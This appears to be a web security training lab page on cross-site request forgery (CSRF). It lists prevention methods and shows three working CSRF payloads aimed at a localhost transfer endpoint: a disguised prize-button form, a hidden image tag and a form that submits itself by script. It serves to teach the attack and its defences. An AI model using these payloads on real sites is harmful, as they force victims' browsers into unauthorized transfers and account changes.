CSRF Attack Lab
🎯Learning Objective: CSRF Vulnerabilities
Cross-Site Request Forgery (CSRF) allows attackers to perform unauthorized actions on behalf of authenticated users. This lab demonstrates different CSRF attack vectors and modern protection mechanisms.
Attack Scenarios:
- Money transfer attacks
- Profile modification
- Admin action hijacking
- Token bypass techniques
Prevention Methods:
- CSRF tokens
- SameSite cookies
- Referer validation
- Double-submit patterns
Toggle CSRF token validation to see the difference in security.
CSRF Attack Examples
Money Transfer Attack
HTML form that transfers money when the victim visits the malicious site and submits it
<form action="http://localhost:3000/api/csrf-transfer" method="POST">
<input type="hidden" name="to" value="attacker" />
<input type="hidden" name="amount" value="500" />
<input type="submit" value="Click here to win a prize!" />
</form>
Image-based CSRF
Uses an img tag to trigger a GET-based CSRF (only works if the endpoint accepts GET for a state-changing action)
<img src="http://localhost:3000/api/csrf-transfer?to=attacker&amount=100"
width="1" height="1" style="display:none;" />
JavaScript Auto-submit
Automatically submits the form when the victim visits the malicious page, so no click is needed
<form id="csrf-form" action="http://localhost:3000/api/csrf-transfer" method="POST">
<input type="hidden" name="to" value="attacker" />
<input type="hidden" name="amount" value="1000" />
</form>
<script>document.getElementById('csrf-form').submit();</script>